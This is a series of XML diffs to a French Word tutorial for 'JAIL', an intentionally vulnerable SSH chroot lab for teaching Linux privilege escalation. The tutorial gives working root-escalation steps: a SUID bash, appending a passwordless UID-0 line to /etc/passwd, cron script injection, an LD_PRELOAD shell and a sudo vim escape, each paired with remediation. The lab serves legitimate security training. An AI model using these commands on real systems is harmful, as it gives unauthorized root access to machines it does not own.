           </w:tcPr>
           <w:p>
             <w:r>
-              <w:t>SSH → Chroot</w:t>
+              <w:t>SSH -&gt; Chroot (/bin/bash)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -371,7 +371,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Quand un binaire possede le bit SUID (Set User ID), il s'execute avec les droits de son proprietaire (root). Si /bin/bash est SUID root, l'option -p (preserve privileges) permet d'ouvrir un shell root.</w:t>
+        <w:t>Theorie : Quand un binaire possede le bit SUID, il s'execute avec les droits de son proprietaire (root). Si /bin/bash est SUID root, -p preserve les privileges.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -389,11 +389,11 @@
       <w:r>
         <w:t>Exploitation (eleve) :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. find / -perm -4000 -type f 2&gt;/dev/null    # Trouver les SUID</w:t>
+        <w:t xml:space="preserve">  1. find / -perm -4000 -type f 2&gt;/dev/null</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. /bin/bash -p                               # Shell root</w:t>
+        <w:t xml:space="preserve">  2. /bin/bash -p</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. whoami                                     # → root</w:t>
+        <w:t xml:space="preserve">  3. whoami  # root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -404,7 +404,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Ne jamais appliquer SUID sur des shells. Auditer avec find / -perm -4000. Utiliser les capabilities Linux au lieu de SUID.</w:t>
+        <w:t>Ne jamais SUID les shells. Auditer avec find. Utiliser capabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -417,7 +417,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : /etc/passwd contient la liste des comptes. Si un utilisateur non privilege peut y ecrire, il peut ajouter un compte avec UID 0 (root) sans mot de passe, puis basculer dessus avec su.</w:t>
+        <w:t>Theorie : Si /etc/passwd est modifiable, on peut ajouter un compte UID 0 sans mdp.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -435,11 +435,11 @@
       <w:r>
         <w:t>Exploitation (eleve) :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. ls -la /etc/passwd                        # Verifier permissions (666)</w:t>
+        <w:t xml:space="preserve">  1. ls -la /etc/passwd</w:t>
         <w:br/>
         <w:t xml:space="preserve">  2. echo 'hacker::0:0:hacker:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. su hacker                                  # Shell root sans mdp</w:t>
+        <w:t xml:space="preserve">  3. su hacker  # root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -463,7 +463,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Cron execute des scripts a intervalles reguliers avec les droits specifies (souvent root). Si le script est modifiable par un attaquant, il peut y injecter du code qui s'executera en root.</w:t>
+        <w:t>Theorie : Un cron root executant un script modifiable permet l'injection de code.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -481,17 +481,11 @@
       <w:r>
         <w:t>Exploitation (eleve) :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. cat /etc/cron.d/vuln_cron                 # Identifier le cron</w:t>
+        <w:t xml:space="preserve">  1. cat /etc/cron.d/vuln_cron</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. echo '#!/bin/bash' &gt; /tmp/malicious.sh</w:t>
+        <w:t xml:space="preserve">  2. Ecrire un script qui copie bash en SUID dans /tmp/rootbash</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. echo 'cp /bin/bash /tmp/rootbash &amp;&amp; chmod 4755 /tmp/rootbash' &gt;&gt; /tmp/malicious.sh</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  4. chmod +x /tmp/malicious.sh</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  5. # Attendre 60 secondes...</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  6. /tmp/rootbash -p                          # Shell root</w:t>
+        <w:t xml:space="preserve">  3. Attendre 60 sec, puis /tmp/rootbash -p</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -502,7 +496,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Fichiers cron en 644 appartenant a root. Scripts immutables (chattr +i). Chemins absolus.</w:t>
+        <w:t>Fichiers cron 644 root. Scripts immutables. Chemins absolus.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -515,7 +509,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : LD_PRELOAD force le chargement d'une bibliotheque partagee avant toutes les autres. Si un binaire SUID (env) execute une commande, on peut injecter une lib malveillante avec une fonction _init() qui ouvre un shell root.</w:t>
+        <w:t>Theorie : LD_PRELOAD force le chargement d'une lib avant toutes les autres. Avec un binaire SUID (env), on injecte _init() -&gt; shell root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -533,11 +527,11 @@
       <w:r>
         <w:t>Exploitation (eleve) :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. Creer exploit.c avec _init() → setuid(0) + system("/bin/bash")</w:t>
+        <w:t xml:space="preserve">  1. Creer exploit.c avec _init() -&gt; setuid(0) + system("/bin/bash")</w:t>
         <w:br/>
         <w:t xml:space="preserve">  2. gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls    # Shell root</w:t>
+        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls  # root</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -548,7 +542,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Pas de SUID sur env. Restreindre gcc en production. Compilation statique des binaires critiques.</w:t>
+        <w:t>Pas de SUID sur env. Restreindre gcc. Compilation statique.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -561,7 +555,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Si sudo autorise un utilisateur a executer vim en tant que root (via sudoers), l'editeur Vim permet de lancer un shell depuis son mode commande avec :shell ou :!/bin/bash. C'est un "escape to shell" classique documente sur GTFOBins (https://gtfobins.github.io/gtfobins/vim/).</w:t>
+        <w:t>Theorie : Si sudo autorise vim en root (sudoers NOPASSWD), Vim permet un escape to shell avec :shell ou :!/bin/bash. Ref: GTFOBins.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -581,13 +575,13 @@
         <w:br/>
         <w:t xml:space="preserve">  - sudo (binaire SUID)</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - PAM (pam_permit.so pour NOPASSWD)</w:t>
+        <w:t xml:space="preserve">  - PAM (pam_permit.so)</w:t>
         <w:br/>
         <w:t xml:space="preserve">  - NSS (nsswitch.conf + libnss_files)</w:t>
         <w:br/>
         <w:t xml:space="preserve">  - /etc/passwd, /etc/group, /etc/shadow</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - /etc/sudoers + /etc/sudoers.d/vuln_vim (jailed ALL=(ALL) NOPASSWD: /bin/vim)</w:t>
+        <w:t xml:space="preserve">  - /etc/sudoers + /etc/sudoers.d/vuln_vim</w:t>
         <w:br/>
         <w:t xml:space="preserve">  - /proc (monte)</w:t>
       </w:r>
@@ -596,20 +590,16 @@
       <w:r>
         <w:t>Exploitation (eleve) :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. sudo -l                                   # Reperer NOPASSWD: /bin/vim</w:t>
+        <w:t xml:space="preserve">  1. sudo -l  # reperer NOPASSWD: /bin/vim</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. sudo /bin/vim                             # Lancer vim en root</w:t>
+        <w:t xml:space="preserve">  2. sudo /bin/vim</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. :set shell=/bin/bash                       # Dans vim</w:t>
+        <w:t xml:space="preserve">  3. :set shell=/bin/bash</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  4. :shell                                    # Escape to shell</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  5. whoami                                    # → root</w:t>
+        <w:t xml:space="preserve">  4. :shell  # root</w:t>
         <w:br/>
         <w:br/>
-        <w:t>Alternative en une commande :</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  sudo vim -c ':!/bin/bash'</w:t>
+        <w:t>Alternative : sudo vim -c ':!/bin/bash'</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -620,7 +610,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Ne jamais donner sudo sur des editeurs (vim, nano, less, more, man). Utiliser sudoedit au lieu de sudo vim. Consulter GTFOBins avant d'ajouter un binaire dans sudoers. Appliquer le principe du moindre privilege.</w:t>
+        <w:t>Ne jamais sudo sur des editeurs. Utiliser sudoedit. Consulter GTFOBins.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -633,22 +623,20 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Commandes disponibles dans le chroot pour la phase de reconnaissance :</w:t>
+        <w:t>Commandes disponibles dans le chroot :</w:t>
         <w:br/>
         <w:br/>
-        <w:t xml:space="preserve">  find / -perm -4000 -type f 2&gt;/dev/null   # Trouver les binaires SUID</w:t>
+        <w:t xml:space="preserve">  find / -perm -4000 -type f 2&gt;/dev/null   # SUID</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  ls -la /etc/passwd                       # Verifier les permissions</w:t>
+        <w:t xml:space="preserve">  ls -la /etc/passwd                       # Permissions</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  cat /etc/cron.d/*                        # Lire les taches cron</w:t>
+        <w:t xml:space="preserve">  cat /etc/cron.d/*                        # Crons</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  sudo -l                                  # Lister les droits sudo</w:t>
+        <w:t xml:space="preserve">  sudo -l                                  # Droits sudo</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  id                                       # Afficher UID/GID courant</w:t>
+        <w:t xml:space="preserve">  id / whoami                              # UID courant</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  whoami                                   # Afficher le nom d'utilisateur</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  grep -r "pattern" /etc/                  # Chercher dans les configs</w:t>
+        <w:t xml:space="preserve">  grep -r "pattern" /etc/                  # Configs</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -661,27 +649,25 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Apres le TP, executer le script de nettoyage en root :</w:t>
+        <w:t>Apres le TP :</w:t>
         <w:br/>
         <w:br/>
         <w:t xml:space="preserve">  sudo ./cleanup_jail.sh</w:t>
         <w:br/>
         <w:br/>
-        <w:t>Ce script effectue :</w:t>
+        <w:t>Actions :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Demontage de /proc dans le chroot</w:t>
+        <w:t xml:space="preserve">  - Demontage /proc</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Suppression de l'utilisateur jailed</w:t>
+        <w:t xml:space="preserve">  - Suppression utilisateur jailed</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Suppression de /home/jailed</w:t>
+        <w:t xml:space="preserve">  - Suppression /home/jailed</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Suppression du bloc Match User dans sshd_config + restart SSH</w:t>
+        <w:t xml:space="preserve">  - Suppression Match User dans sshd_config + restart SSH</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Suppression des regles sudoers vulnerables</w:t>
+        <w:t xml:space="preserve">  - Suppression sudoers vulnerables</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - Nettoyage des taches cron et binaires SUID suspects</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Verification des permissions /etc/passwd</w:t>
+        <w:t xml:space="preserve">  - Nettoyage crons et SUID suspects</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -693,7 +679,7 @@
         <w:t xml:space="preserve">IMPORTANT : </w:t>
       </w:r>
       <w:r>
-        <w:t>Ne jamais laisser un environnement vulnerable actif au-dela du TP. Snapshot la VM avant, detruire apres.</w:t>
+        <w:t>Ne jamais laisser un environnement vulnerable actif au-dela du TP.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -717,7 +703,7 @@
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
       <w:r>
-        <w:t>HackTricks Linux PrivEsc : https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
+        <w:t>HackTricks : https://book.hacktricks.xyz/linux-hardening/privilege-escalation</w:t>
       </w:r>
     </w:p>
     <w:p>

</xml_diff>

<commit_message>
v2.2: fix chmod /dev permissions, ajout /etc/passwd+group dans chroot, MAJ docs
Bug 8: chmod -R 755 écrasait les permissions des devices (/dev/null, /dev/tty,
/dev/urandom) → "Permission denied". Les permissions sont maintenant restaurées
après le chmod global (666/666/444).

Bug 9: /etc/passwd et /etc/group absents du chroot → whoami/id retournaient
"cannot find name for user ID 0". Le setup crée maintenant ces fichiers avec
les entrées root et jailed (UID/GID dynamiques).

Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
</commit_message>
<xml_diff>
--- a/Tuto.docx
+++ b/Tuto.docx
@@ -8,7 +8,7 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>JAIL v2.1 — Laboratoire de Privilege Escalation Linux</w:t>
+        <w:t>JAIL v2.2 — Laboratoire de Privilege Escalation Linux</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -48,7 +48,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>JAIL v2.1 est un environnement chroot SSH vulnerable concu pour l'apprentissage des techniques d'elevation de privileges sous Linux. L'utilisateur "jailed" est enferme dans un chroot via la configuration SSH (Match User + ChrootDirectory) avec un jeu limite de binaires. L'isolation repose entierement sur le ChrootDirectory SSH, pas sur un shell restreint.</w:t>
+        <w:t>JAIL v2.2 est un environnement chroot SSH vulnerable concu pour l'apprentissage des techniques d'elevation de privileges sous Linux. L'utilisateur "jailed" est enferme dans un chroot via la configuration SSH (Match User + ChrootDirectory) avec un jeu limite de binaires. L'isolation repose entierement sur le ChrootDirectory SSH.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -143,7 +143,7 @@
         <w:t xml:space="preserve">Note : </w:t>
       </w:r>
       <w:r>
-        <w:t>Le script setup_jail.sh installe automatiquement les dependances manquantes (vim, python3, gcc) et configure le chroot SSH (bloc Match User dans sshd_config). Aucune configuration manuelle n'est necessaire.</w:t>
+        <w:t>Le script setup_jail.sh installe automatiquement les dependances manquantes (vim, python3, gcc), cree /etc/passwd et /etc/group dans le chroot (necessaires pour whoami, id, su), et configure le chroot SSH (bloc Match User dans sshd_config).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -174,13 +174,15 @@
         <w:br/>
         <w:t xml:space="preserve">  lib/ &amp; lib64/         # Bibliotheques dynamiques (arborescence reelle)</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  etc/                  # passwd, group, shadow, sudoers, pam.d, cron.d</w:t>
+        <w:t xml:space="preserve">  etc/                  # passwd, group (crees par setup_jail.sh)</w:t>
+        <w:br/>
+        <w:t xml:space="preserve">                        # shadow, sudoers, pam.d (crees par vuln_sudo_vim.sh)</w:t>
         <w:br/>
         <w:t xml:space="preserve">  tmp/                  # Zone d'ecriture pour les exploits</w:t>
         <w:br/>
         <w:t xml:space="preserve">  proc/                 # Monte par vuln_sudo_vim.sh</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  dev/                  # null, tty, urandom</w:t>
+        <w:t xml:space="preserve">  dev/                  # null (666), tty (666), urandom (444)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -199,7 +201,7 @@
         <w:t xml:space="preserve">IMPORTANT : </w:t>
       </w:r>
       <w:r>
-        <w:t>L'isolation de l'utilisateur jailed repose entierement sur le ChrootDirectory SSH. L'utilisateur a un shell bash standard (/bin/bash). C'est la directive ChrootDirectory dans sshd_config qui enferme l'utilisateur dans /home/jailed lors de la connexion SSH. Aucun shell restreint (rbash) n'est utilise.</w:t>
+        <w:t>L'isolation de l'utilisateur jailed repose entierement sur le ChrootDirectory SSH. L'utilisateur a un shell bash standard (/bin/bash). C'est la directive ChrootDirectory dans sshd_config qui l'enferme dans /home/jailed lors de la connexion SSH.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -220,13 +222,13 @@
         <w:br/>
         <w:t>Prerequis du ChrootDirectory :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - /home/jailed et tous ses parents doivent appartenir a root:root</w:t>
+        <w:t xml:space="preserve">  - /home/jailed et tous ses parents : root:root</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - /home/jailed doit etre en 755 (pas d'ecriture par groupe/others)</w:t>
+        <w:t xml:space="preserve">  - /home/jailed : 755</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - ForceCommand pointe vers /bin/bash (chemin DANS le chroot)</w:t>
+        <w:t xml:space="preserve">  - ForceCommand : /bin/bash (chemin DANS le chroot)</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  - SSH est redemarre apres modification</w:t>
+        <w:t xml:space="preserve">  - SSH redemarre apres modification</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -346,7 +348,7 @@
         <w:t xml:space="preserve">FORMATEUR (root sur Debian) : </w:t>
       </w:r>
       <w:r>
-        <w:t>Active les vulnerabilites cote serveur avec les scripts vuln_*.sh. Il prepare l'environnement AVANT que l'eleve ne se connecte.</w:t>
+        <w:t>Active les vulnerabilites avec les scripts vuln_*.sh AVANT que l'eleve se connecte.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -358,7 +360,7 @@
         <w:t xml:space="preserve">ELEVE (SSH en tant que jailed) : </w:t>
       </w:r>
       <w:r>
-        <w:t>Se connecte en SSH (ssh jailed@&lt;IP&gt;) et doit decouvrir puis exploiter les failles sans connaitre les scripts. Outils disponibles : find, grep, id, whoami, sudo -l, ls -la.</w:t>
+        <w:t>Se connecte en SSH et doit decouvrir puis exploiter les failles. Outils : find, grep, id, whoami, sudo -l.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -371,7 +373,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Quand un binaire possede le bit SUID, il s'execute avec les droits de son proprietaire (root). Si /bin/bash est SUID root, -p preserve les privileges.</w:t>
+        <w:t>Theorie : SUID = execute avec les droits du proprietaire (root). /bin/bash -p preserve les privileges.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -379,7 +381,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation (formateur) : </w:t>
+        <w:t xml:space="preserve">Activation : </w:t>
       </w:r>
       <w:r>
         <w:t>sudo ./vuln_suid.sh</w:t>
@@ -387,7 +389,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation (eleve) :</w:t>
+        <w:t>Exploitation :</w:t>
         <w:br/>
         <w:t xml:space="preserve">  1. find / -perm -4000 -type f 2&gt;/dev/null</w:t>
         <w:br/>
@@ -404,7 +406,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Ne jamais SUID les shells. Auditer avec find. Utiliser capabilities.</w:t>
+        <w:t>Ne jamais SUID les shells. Utiliser capabilities.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -417,7 +419,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Si /etc/passwd est modifiable, on peut ajouter un compte UID 0 sans mdp.</w:t>
+        <w:t>Theorie : /etc/passwd modifiable → ajout d'un compte UID 0 sans mot de passe.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -425,7 +427,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation (formateur) : </w:t>
+        <w:t xml:space="preserve">Activation : </w:t>
       </w:r>
       <w:r>
         <w:t>sudo ./vuln_passwd.sh</w:t>
@@ -433,9 +435,9 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation (eleve) :</w:t>
+        <w:t>Exploitation :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. ls -la /etc/passwd</w:t>
+        <w:t xml:space="preserve">  1. ls -la /etc/passwd  # verifier 666</w:t>
         <w:br/>
         <w:t xml:space="preserve">  2. echo 'hacker::0:0:hacker:/root:/bin/bash' &gt;&gt; /etc/passwd</w:t>
         <w:br/>
@@ -450,7 +452,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>chmod 644 /etc/passwd. Surveillance d'integrite (AIDE, OSSEC).</w:t>
+        <w:t>chmod 644 /etc/passwd. Surveillance AIDE/OSSEC.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -463,7 +465,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Un cron root executant un script modifiable permet l'injection de code.</w:t>
+        <w:t>Theorie : Cron root + script modifiable = injection de code en root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -471,7 +473,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation (formateur) : </w:t>
+        <w:t xml:space="preserve">Activation : </w:t>
       </w:r>
       <w:r>
         <w:t>sudo ./vuln_cron.sh</w:t>
@@ -479,13 +481,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation (eleve) :</w:t>
+        <w:t>Exploitation :</w:t>
         <w:br/>
         <w:t xml:space="preserve">  1. cat /etc/cron.d/vuln_cron</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  2. Ecrire un script qui copie bash en SUID dans /tmp/rootbash</w:t>
+        <w:t xml:space="preserve">  2. Ecrire payload dans malicious.sh</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. Attendre 60 sec, puis /tmp/rootbash -p</w:t>
+        <w:t xml:space="preserve">  3. Attendre 60 sec → /tmp/rootbash -p</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -496,7 +498,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Fichiers cron 644 root. Scripts immutables. Chemins absolus.</w:t>
+        <w:t>Crons 644 root. Scripts immutables. Chemins absolus.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -509,7 +511,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : LD_PRELOAD force le chargement d'une lib avant toutes les autres. Avec un binaire SUID (env), on injecte _init() -&gt; shell root.</w:t>
+        <w:t>Theorie : LD_PRELOAD + binaire SUID (env) → injection _init() → shell root.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -517,7 +519,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation (formateur) : </w:t>
+        <w:t xml:space="preserve">Activation : </w:t>
       </w:r>
       <w:r>
         <w:t>sudo ./vuln_ldpreload.sh</w:t>
@@ -525,13 +527,13 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation (eleve) :</w:t>
+        <w:t>Exploitation :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. Creer exploit.c avec _init() -&gt; setuid(0) + system("/bin/bash")</w:t>
+        <w:t xml:space="preserve">  1. Creer exploit.c (_init → setuid(0) + system("/bin/bash"))</w:t>
         <w:br/>
         <w:t xml:space="preserve">  2. gcc -fPIC -shared -o /tmp/exploit.so exploit.c -nostartfiles</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls  # root</w:t>
+        <w:t xml:space="preserve">  3. env LD_PRELOAD=/tmp/exploit.so /bin/ls</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -542,7 +544,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Pas de SUID sur env. Restreindre gcc. Compilation statique.</w:t>
+        <w:t>Pas de SUID sur env. Restreindre gcc.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -555,7 +557,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Theorie : Si sudo autorise vim en root (sudoers NOPASSWD), Vim permet un escape to shell avec :shell ou :!/bin/bash. Ref: GTFOBins.</w:t>
+        <w:t>Theorie : sudo vim NOPASSWD → :shell ou :!/bin/bash → root. Ref: GTFOBins.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -563,7 +565,7 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Activation (formateur) : </w:t>
+        <w:t xml:space="preserve">Activation : </w:t>
       </w:r>
       <w:r>
         <w:t>sudo ./vuln_sudo_vim.sh</w:t>
@@ -571,32 +573,18 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Ce script installe dans le chroot :</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - sudo (binaire SUID)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - PAM (pam_permit.so)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - NSS (nsswitch.conf + libnss_files)</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - /etc/passwd, /etc/group, /etc/shadow</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - /etc/sudoers + /etc/sudoers.d/vuln_vim</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - /proc (monte)</w:t>
+        <w:t>Installe : sudo SUID, PAM, NSS, passwd/group/shadow enrichis, sudoers, /proc.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Exploitation (eleve) :</w:t>
+        <w:t>Exploitation :</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  1. sudo -l  # reperer NOPASSWD: /bin/vim</w:t>
+        <w:t xml:space="preserve">  1. sudo -l  # NOPASSWD: /bin/vim</w:t>
         <w:br/>
         <w:t xml:space="preserve">  2. sudo /bin/vim</w:t>
         <w:br/>
-        <w:t xml:space="preserve">  3. :set shell=/bin/bash</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  4. :shell  # root</w:t>
+        <w:t xml:space="preserve">  3. :set shell=/bin/bash → :shell</w:t>
         <w:br/>
         <w:br/>
         <w:t>Alternative : sudo vim -c ':!/bin/bash'</w:t>
@@ -610,7 +598,7 @@
         <w:t xml:space="preserve">Remediation : </w:t>
       </w:r>
       <w:r>
-        <w:t>Ne jamais sudo sur des editeurs. Utiliser sudoedit. Consulter GTFOBins.</w:t>
+        <w:t>Ne jamais sudo sur des editeurs. Utiliser sudoedit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -623,9 +611,6 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Commandes disponibles dans le chroot :</w:t>
-        <w:br/>
-        <w:br/>
         <w:t xml:space="preserve">  find / -perm -4000 -type f 2&gt;/dev/null   # SUID</w:t>
         <w:br/>
         <w:t xml:space="preserve">  ls -la /etc/passwd                       # Permissions</w:t>
@@ -649,25 +634,10 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>Apres le TP :</w:t>
-        <w:br/>
-        <w:br/>
         <w:t xml:space="preserve">  sudo ./cleanup_jail.sh</w:t>
         <w:br/>
         <w:br/>
-        <w:t>Actions :</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Demontage /proc</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Suppression utilisateur jailed</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Suppression /home/jailed</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Suppression Match User dans sshd_config + restart SSH</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Suppression sudoers vulnerables</w:t>
-        <w:br/>
-        <w:t xml:space="preserve">  - Nettoyage crons et SUID suspects</w:t>
+        <w:t>Actions : demontage /proc, suppression utilisateur, suppression /home/jailed, suppression Match User SSH + restart, sudoers, crons, SUID suspects.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -712,14 +682,6 @@
       </w:pPr>
       <w:r>
         <w:t>MITRE ATT&amp;CK : https://attack.mitre.org</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:t>ANSSI Guide Hygiene v3</w:t>
       </w:r>
     </w:p>
     <w:sectPr>

</xml_diff>

<commit_message>
v2.3: ajout PAM+NSS+shadow dans setup base, fix su critical error, cleanup vuln_sudo_vim.sh
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
</commit_message>
<xml_diff>
--- a/Tuto.docx
+++ b/Tuto.docx
@@ -8,34 +8,12 @@
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
-        <w:t>JAIL v2.2 — Laboratoire de Privilege Escalation Linux</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:color w:val="646464"/>
-          <w:sz w:val="28"/>
-        </w:rPr>
-        <w:t>Guide pedagogique complet pour formateurs et eleves</w:t>
+        <w:t>JAIL v2.3 — Laboratoire de Privilege Escalation Linux</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:jc w:val="center"/>
-      </w:pPr>
       <w:r>
-        <w:rPr>
-          <w:color w:val="C83232"/>
-          <w:sz w:val="18"/>
-        </w:rPr>
-        <w:t>Usage strictement reserve a un lab isole / CTF interne</w:t>
